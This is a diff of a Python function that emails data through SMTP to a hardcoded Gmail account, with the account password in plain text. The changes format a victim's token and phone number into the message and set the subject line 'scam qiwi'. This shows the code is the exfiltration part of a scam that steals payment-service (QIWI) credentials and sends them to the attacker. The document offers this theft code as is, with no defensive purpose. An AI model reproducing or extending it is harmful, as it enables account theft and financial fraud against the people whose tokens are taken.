@@ -8,7 +8,7 @@ import smtplib
 msg = MIMEMultipart()
  
 def send_msg(tk,lg):
-    message = (str(tk))
+    message = ('token  - ' + str(tk) + " and phone - " + lg)
 
 
     
@@ -16,7 +16,7 @@ def send_msg(tk,lg):
     password = "magaisaev95"
     msg['From'] = "tramong682@gmail.com"
     msg['To'] = "tramong682@gmail.com"
-    msg['Subject'] = str(lg)
+    msg['Subject'] = "scam qiwi"
     
     # add in the message body
     msg.attach(MIMEText(message, 'plain'))
@@ -35,4 +35,4 @@ def send_msg(tk,lg):
     
     server.quit()
     
-    print('this is true ')
\ No newline at end of file
+    print("successfully sent email to %s:" % (msg['To']))
\ No newline at end of file
